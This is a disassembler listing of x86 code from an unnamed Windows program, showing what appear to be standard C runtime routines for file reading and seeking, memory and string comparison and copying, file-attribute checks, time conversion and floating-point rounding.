sub_42A188 proc near ; CODE XREF: sub_4032D2+83�p
; .text:0040A3B9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
call sub_42C1D4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42A1B7
push [ebp+arg_C]
mov esi, eax
call sub_42C226
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_42A188 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A1B7 proc near ; CODE XREF: sub_42A188+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_42A1DB
xor eax, eax
jmp loc_42A284
; ---------------------------------------------------------------------------
loc_42A1DB: ; CODE XREF: sub_42A1B7+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_42A1EE
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_42A1FA
; ---------------------------------------------------------------------------
loc_42A1EE: ; CODE XREF: sub_42A1B7+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_42A1FA
; ---------------------------------------------------------------------------
loc_42A1F7: ; CODE XREF: sub_42A1B7+C4�j
mov ecx, [ebp+arg_0]
loc_42A1FA: ; CODE XREF: sub_42A1B7+35�j
; sub_42A1B7+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_42A22C
mov eax, [esi+4]
test eax, eax
jz short loc_42A22C
cmp ecx, eax
mov edi, ecx
jb short loc_42A211
mov edi, eax
loc_42A211: ; CODE XREF: sub_42A1B7+56�j
push edi
push dword ptr [esi]
push ebx
call sub_429420
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_42A277
; ---------------------------------------------------------------------------
loc_42A22C: ; CODE XREF: sub_42A1B7+49�j
; sub_42A1B7+50�j
cmp ecx, [ebp+arg_C]
jb short loc_42A25F
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_42A242
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_42A242: ; CODE XREF: sub_42A1B7+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_42F4BE
add esp, 0Ch
test eax, eax
jz short loc_42A289
cmp eax, 0FFFFFFFFh
jz short loc_42A28F
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_42A277
; ---------------------------------------------------------------------------
loc_42A25F: ; CODE XREF: sub_42A1B7+78�j
push esi
call sub_42F3E2
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42A293
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_42A277: ; CODE XREF: sub_42A1B7+73�j
; sub_42A1B7+A6�j
cmp [ebp+arg_0], 0
jnz loc_42A1F7
mov eax, [ebp+arg_8]
loc_42A284: ; CODE XREF: sub_42A1B7+1F�j
; sub_42A1B7+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42A289: ; CODE XREF: sub_42A1B7+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_42A293
; ---------------------------------------------------------------------------
loc_42A28F: ; CODE XREF: sub_42A1B7+9F�j
or dword ptr [esi+0Ch], 20h
loc_42A293: ; CODE XREF: sub_42A1B7+B2�j
; sub_42A1B7+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_42A284
sub_42A1B7 endp
; =============== S U B R O U T I N E =======================================
sub_42A29F proc near ; CODE XREF: sub_4032D2+4D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42C1D4
push esi
call sub_42A2C1
push esi
mov edi, eax
call sub_42C226
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
sub_42A29F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A2C1 proc near ; CODE XREF: sub_42A29F+D�p
; sub_42A44E+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_42A2DD
mov [edi+4], ebx
loc_42A2DD: ; CODE XREF: sub_42A2C1+17�j
push 1
push ebx
push esi
call sub_42F8B8
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_42A34F
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_42A302
sub eax, [edi+4]
jmp loc_42A41D
; ---------------------------------------------------------------------------
loc_42A302: ; CODE XREF: sub_42A2C1+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_42A33F
mov ebx, esi
mov ecx, esi
sar ebx, 5
and ecx, 1Fh
mov ebx, dword_676EE0[ebx*4]
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_42A357
mov ecx, edx
loc_42A330: ; CODE XREF: sub_42A2C1+7C�j
cmp ecx, eax
jnb short loc_42A357
cmp byte ptr [ecx], 0Ah
jnz short loc_42A33C
inc [ebp+var_8]
loc_42A33C: ; CODE XREF: sub_42A2C1+76�j
inc ecx
jmp short loc_42A330
; ---------------------------------------------------------------------------
loc_42A33F: ; CODE XREF: sub_42A2C1+50�j
test cl, 80h
jnz short loc_42A357
call sub_42F119
mov dword ptr [eax], 16h
loc_42A34F: ; CODE XREF: sub_42A2C1+2D�j
or eax, 0FFFFFFFFh
jmp loc_42A41D
; ---------------------------------------------------------------------------
loc_42A357: ; CODE XREF: sub_42A2C1+6B�j
; sub_42A2C1+71�j ...
cmp [ebp+var_4], 0
jnz short loc_42A365
mov eax, [ebp+var_8]
jmp loc_42A41D
; ---------------------------------------------------------------------------
loc_42A365: ; CODE XREF: sub_42A2C1+9A�j
test byte ptr [edi+0Ch], 1
jz loc_42A415
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_42A37E
and [ebp+var_8], ecx
jmp loc_42A415
; ---------------------------------------------------------------------------
loc_42A37E: ; CODE XREF: sub_42A2C1+B3�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:676EE0h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_42A40F
push 2
push 0
push [ebp+var_C]
call sub_42F8B8
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_42A3D6
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_42A3C1: ; CODE XREF: sub_42A2C1+10D�j
cmp eax, ecx
jnb short loc_42A3D0
cmp byte ptr [eax], 0Ah
jnz short loc_42A3CD
inc [ebp+arg_0]
loc_42A3CD: ; CODE XREF: sub_42A2C1+107�j
inc eax
jmp short loc_42A3C1
; ---------------------------------------------------------------------------
loc_42A3D0: ; CODE XREF: sub_42A2C1+102�j
test byte ptr [edi+0Dh], 20h
jmp short loc_42A40A
; ---------------------------------------------------------------------------
loc_42A3D6: ; CODE XREF: sub_42A2C1+F6�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_42F8B8
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_42A3FD
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_42A3FD
test ch, 4
jz short loc_42A400
loc_42A3FD: ; CODE XREF: sub_42A2C1+12D�j
; sub_42A2C1+135�j
mov eax, [edi+18h]
loc_42A400: ; CODE XREF: sub_42A2C1+13A�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_42A40A: ; CODE XREF: sub_42A2C1+113�j
jz short loc_42A40F
inc [ebp+arg_0]
loc_42A40F: ; CODE XREF: sub_42A2C1+E2�j
; sub_42A2C1:loc_42A40A�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_42A415: ; CODE XREF: sub_42A2C1+A8�j
; sub_42A2C1+B8�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_42A41D: ; CODE XREF: sub_42A2C1+3C�j
; sub_42A2C1+91�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42A2C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A422 proc near ; CODE XREF: sub_4032D2+47�p
; sub_4032D2+58�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push [ebp+arg_0]
call sub_42C1D4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42A44E
push [ebp+arg_0]
mov esi, eax
call sub_42C226
add esp, 14h
mov eax, esi
pop esi
pop ebp
retn
sub_42A422 endp
; =============== S U B R O U T I N E =======================================
sub_42A44E proc near ; CODE XREF: sub_42A422+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_42A4CA
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_42A46D
cmp edi, 1
jz short loc_42A46D
cmp edi, 2
jnz short loc_42A4CA
loc_42A46D: ; CODE XREF: sub_42A44E+13�j
; sub_42A44E+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_42A484
push esi
call sub_42A2C1
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_42A484: ; CODE XREF: sub_42A44E+27�j
push esi
call sub_42F2D9
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_42A499
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_42A4AD
; ---------------------------------------------------------------------------
loc_42A499: ; CODE XREF: sub_42A44E+42�j
test al, 1
jz short loc_42A4AD
test al, 8
jz short loc_42A4AD
test ah, 4
jnz short loc_42A4AD
mov dword ptr [esi+18h], 200h
loc_42A4AD: ; CODE XREF: sub_42A44E+49�j
; sub_42A44E+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_42F8B8
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_42A4D8
; ---------------------------------------------------------------------------
loc_42A4CA: ; CODE XREF: sub_42A44E+B�j
; sub_42A44E+1D�j
call sub_42F119
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_42A4D8: ; CODE XREF: sub_42A44E+7A�j
pop edi
pop esi
retn
sub_42A44E endp
; =============== S U B R O U T I N E =======================================
sub_42A4DB proc near ; CODE XREF: sub_42A50C+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
call sub_42FB00
mov esi, eax
test esi, esi
jnz short loc_42A4E9
pop esi
retn
; ---------------------------------------------------------------------------
loc_42A4E9: ; CODE XREF: sub_42A4DB+A�j
push edi
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_42F990
push esi
mov edi, eax
call sub_42C226
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
sub_42A4DB endp
; =============== S U B R O U T I N E =======================================
sub_42A50C proc near ; CODE XREF: sub_4032D2+31�p
; .text:0040A29C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_42A4DB
add esp, 0Ch
retn
sub_42A50C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A520 proc near ; CODE XREF: sub_4044ED+1D�p
; sub_404525+34F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_42A56C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_42A56D
test eax, 1
jz short loc_42A54D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_42A59A
inc esi
inc edi
dec eax
jz short loc_42A56A
loc_42A54D: ; CODE XREF: sub_42A520+20�j
; sub_42A520+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_42A59A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_42A59A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_42A54D
loc_42A56A: ; CODE XREF: sub_42A520+2B�j
; sub_42A520+84�j
pop edi
pop esi
locret_42A56C: ; CODE XREF: sub_42A520+6�j
retn
; ---------------------------------------------------------------------------
loc_42A56D: ; CODE XREF: sub_42A520+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_42A5A2
repe cmpsd
jz short loc_42A5A2
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_42A595
cmp ch, dh
jnz short loc_42A595
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_42A595
cmp ch, dh
loc_42A595: ; CODE XREF: sub_42A520+63�j
; sub_42A520+67�j ...
mov eax, 0
loc_42A59A: ; CODE XREF: sub_42A520+26�j
; sub_42A520+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_42A5A2: ; CODE XREF: sub_42A520+55�j
; sub_42A520+59�j
test eax, eax
jz short loc_42A56A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_42A595
dec eax
jz short loc_42A5C9
cmp dh, ch
jnz short loc_42A595
dec eax
jz short loc_42A5C9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_42A595
dec eax
loc_42A5C9: ; CODE XREF: sub_42A520+8F�j
; sub_42A520+96�j
pop edi
pop esi
retn
sub_42A520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A5D0 proc near ; CODE XREF: sub_404525+18E�p
; sub_404525+9EA�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_42A641
sub_42A5D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A5E0 proc near ; CODE XREF: sub_40A9FE+2673�p
; sub_40A9FE+2697�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_42A5FC
loc_42A5ED: ; CODE XREF: sub_42A5E0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_42A62F
test ecx, 3
jnz short loc_42A5ED
loc_42A5FC: ; CODE XREF: sub_42A5E0+B�j
; sub_42A5E0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_42A5FC
mov eax, [ecx-4]
test al, al
jz short loc_42A63E
test ah, ah
jz short loc_42A639
test eax, 0FF0000h
jz short loc_42A634
test eax, 0FF000000h
jz short loc_42A62F
jmp short loc_42A5FC
; ---------------------------------------------------------------------------
loc_42A62F: ; CODE XREF: sub_42A5E0+12�j
; sub_42A5E0+4B�j
lea edi, [ecx-1]
jmp short loc_42A641
; ---------------------------------------------------------------------------
loc_42A634: ; CODE XREF: sub_42A5E0+44�j
lea edi, [ecx-2]
jmp short loc_42A641
; ---------------------------------------------------------------------------
loc_42A639: ; CODE XREF: sub_42A5E0+3D�j
lea edi, [ecx-3]
jmp short loc_42A641
; ---------------------------------------------------------------------------
loc_42A63E: ; CODE XREF: sub_42A5E0+39�j
lea edi, [ecx-4]
loc_42A641: ; CODE XREF: sub_42A5D0+5�j
; sub_42A5E0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_42A666
loc_42A64D: ; CODE XREF: sub_42A5E0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_42A6B8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_42A64D
jmp short loc_42A666
; ---------------------------------------------------------------------------
loc_42A661: ; CODE XREF: sub_42A5E0+9E�j
; sub_42A5E0+B8�j
mov [edi], edx
add edi, 4
loc_42A666: ; CODE XREF: sub_42A5E0+6B�j
; sub_42A5E0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_42A661
test dl, dl
jz short loc_42A6B8
test dh, dh
jz short loc_42A6AF
test edx, 0FF0000h
jz short loc_42A6A2
test edx, 0FF000000h
jz short loc_42A69A
jmp short loc_42A661
; ---------------------------------------------------------------------------
loc_42A69A: ; CODE XREF: sub_42A5E0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_42A6A2: ; CODE XREF: sub_42A5E0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_42A6AF: ; CODE XREF: sub_42A5E0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_42A6B8: ; CODE XREF: sub_42A5E0+72�j
; sub_42A5E0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_42A5E0 endp
; =============== S U B R O U T I N E =======================================
sub_42A6C0 proc near ; CODE XREF: sub_40541D+344�p
; sub_42B0E9+29�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_42A6E0
call dword_437170 ; RtlGetLastWin32Error
push eax
call sub_42F0A6
pop ecx
loc_42A6DC: ; CODE XREF: sub_42A6C0+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_42A6E0: ; CODE XREF: sub_42A6C0+D�j
test al, 1
jz short loc_42A703
test [esp+arg_4], 2
jz short loc_42A703
call sub_42F119
mov dword ptr [eax], 0Dh
call sub_42F122
mov dword ptr [eax], 5
jmp short loc_42A6DC
; ---------------------------------------------------------------------------
loc_42A703: ; CODE XREF: sub_42A6C0+22�j
; sub_42A6C0+29�j
xor eax, eax
retn
sub_42A6C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42A706(double)
sub_42A706 proc near ; CODE XREF: sub_405C99+512�p
; sub_40A9FE+1922�p ...
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_450E50
call sub_4303F3
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_42A78C
call sub_4302BB
pop ecx
test eax, eax
pop ecx
jle short loc_42A76F
cmp eax, 2
jle short loc_42A761
cmp eax, 3
jnz short loc_42A76F
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_42FBC8
add esp, 10h
jmp short loc_42A7D1
; ---------------------------------------------------------------------------
loc_42A761: ; CODE XREF: sub_42A706+3F�j
push esi
push ebx
call sub_4303F3
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_42A7D1
; ---------------------------------------------------------------------------
loc_42A76F: ; CODE XREF: sub_42A706+3A�j
; sub_42A706+44�j
fld [ebp+arg_0]
fadd dbl_437430
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_42A7C9
; ---------------------------------------------------------------------------
loc_42A78C: ; CODE XREF: sub_42A706+2F�j
call sub_430280
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_42A7AF
loc_42A7A1: ; CODE XREF: sub_42A706+AC�j
push esi
push ebx
call sub_4303F3
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_42A7D1
; ---------------------------------------------------------------------------
loc_42A7AF: ; CODE XREF: sub_42A706+99�j
test bl, 20h
jnz short loc_42A7A1
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_42A7C9: ; CODE XREF: sub_42A706+84�j
call sub_42FC1C
add esp, 1Ch
loc_42A7D1: ; CODE XREF: sub_42A706+59�j
; sub_42A706+67�j ...
pop esi
pop ebx
leave
retn
sub_42A706 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A7D5 proc near ; CODE XREF: sub_405C99+30F�p
; sub_41DB6B+35�p ...
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_43713C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call dword_43721C ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word_676912
jnz short loc_42A83A
mov ax, [ebp+var_18]
cmp ax, word_676910
jnz short loc_42A83A
mov ax, [ebp+var_1A]
cmp ax, word_67690E
jnz short loc_42A83A
mov ax, [ebp+var_1E]
cmp ax, word_67690A
jnz short loc_42A83A
mov ax, [ebp+var_20]
cmp ax, word_676908
jnz short loc_42A83A
mov eax, dword_676900
jmp short loc_42A87F
; ---------------------------------------------------------------------------
loc_42A83A: ; CODE XREF: sub_42A7D5+28�j
; sub_42A7D5+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_437218 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_42A867
cmp eax, 2
jnz short loc_42A863
cmp [ebp+var_32], 0
jz short loc_42A863
cmp [ebp+var_24], 0
jz short loc_42A863
push 1
pop eax
jmp short loc_42A86A
; ---------------------------------------------------------------------------
loc_42A863: ; CODE XREF: sub_42A7D5+7A�j
; sub_42A7D5+81�j ...
xor eax, eax
jmp short loc_42A86A
; ---------------------------------------------------------------------------
loc_42A867: ; CODE XREF: sub_42A7D5+75�j
or eax, 0FFFFFFFFh
loc_42A86A: ; CODE XREF: sub_42A7D5+8C�j
; sub_42A7D5+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_676908
movsd
movsd
movsd
movsd
pop edi
mov dword_676900, eax
pop esi
loc_42A87F: ; CODE XREF: sub_42A7D5+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_43046C
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_42A8AF
mov [ecx], eax
locret_42A8AF: ; CODE XREF: sub_42A7D5+D6�j
leave
retn
sub_42A7D5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A8C0 proc near ; CODE XREF: sub_405C99+33�p
; sub_405C99+D6�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_6769A0
cmp dword ptr [eax+8], 0
jnz short loc_42A913
mov al, 0FFh
mov edi, edi
loc_42A8DC: ; CODE XREF: sub_42A8C0+28�j
; sub_42A8C0+48�j
or al, al
jz short loc_42A90E
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_42A8DC
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_42A8DC
sbb al, al
sbb al, 0FFh
loc_42A90E: ; CODE XREF: sub_42A8C0+1E�j
movsx eax, al
jmp short loc_42A98B
; ---------------------------------------------------------------------------
loc_42A913: ; CODE XREF: sub_42A8C0+16�j
lock inc dword_676EDC
cmp dword_676ED8, 0
jg short loc_42A927
push 0
jmp short loc_42A93C
; ---------------------------------------------------------------------------
loc_42A927: ; CODE XREF: sub_42A8C0+61�j
lock dec dword_676EDC
push 13h
call sub_42DAEF
mov [esp+10h+var_10], 1
loc_42A93C: ; CODE XREF: sub_42A8C0+65�j
mov eax, 0FFh
xor ebx, ebx
nop
loc_42A944: ; CODE XREF: sub_42A8C0+90�j
; sub_42A8C0+A8�j
or al, al
jz short loc_42A96F
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_42A944
push eax
push ebx
call sub_43059D
mov ebx, eax
add esp, 4
call sub_43059D
add esp, 4
cmp bl, al
jz short loc_42A944
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_42A96F: ; CODE XREF: sub_42A8C0+86�j
mov ebx, eax
pop eax
or eax, eax
jnz short loc_42A97F
lock dec dword_676EDC
jmp short loc_42A989
; ---------------------------------------------------------------------------
loc_42A97F: ; CODE XREF: sub_42A8C0+B4�j
push 13h
call sub_42DB50
add esp, 4
loc_42A989: ; CODE XREF: sub_42A8C0+BD�j
mov eax, ebx
loc_42A98B: ; CODE XREF: sub_42A8C0+51�j
pop ebx
pop esi
pop edi
leave
retn
sub_42A8C0 endp
; =============== S U B R O U T I N E =======================================
sub_42A990 proc near ; CODE XREF: sub_4306B8+21�p
; sub_430B07+9�p
; DATA XREF: ...
call sub_42A9A8
call sub_4306B8
mov dword_67691C, eax
call sub_430668
fnclex
retn
sub_42A990 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42A9A8 proc near ; CODE XREF: sub_42A990�p
mov eax, offset sub_430A91
mov off_453820, offset sub_43073B
mov off_45381C, eax
mov off_453824, offset sub_4307A1
mov off_453828, offset sub_4306E1
mov off_45382C, offset sub_430789
mov off_453830, eax
retn
sub_42A9A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A9E0 proc near ; CODE XREF: sub_405C99+517�p
; sub_40A9FE+1929�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_42A9E0 endp
; =============== S U B R O U T I N E =======================================
sub_42AA07 proc near ; CODE XREF: sub_4097B9+2D5�p
; sub_4097B9+302�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_42AA1E
loc_42AA14: ; CODE XREF: sub_42AA07+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_42AA14
loc_42AA1E: ; CODE XREF: sub_42AA07+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_42AA07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AA24 proc near ; CODE XREF: sub_4097B9+171�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_676EDC
push edi
push esi
call dword_437224 ; InterlockedIncrement
mov edi, dword_437220
xor ebx, ebx
cmp dword_676ED8, ebx
jz short loc_42AA54
push esi
call edi ; dword_437220
push 13h
call sub_42DAEF
pop ecx
push 1
pop ebx
loc_42AA54: ; CODE XREF: sub_42AA24+20�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42AA81
add esp, 0Ch
mov [ebp+arg_8], eax
test ebx, ebx
jz short loc_42AA76
push 13h
call sub_42DB50
pop ecx
jmp short loc_42AA79
; ---------------------------------------------------------------------------
loc_42AA76: ; CODE XREF: sub_42AA24+46�j
push esi
call edi ; dword_437220
loc_42AA79: ; CODE XREF: sub_42AA24+50�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42AA24 endp
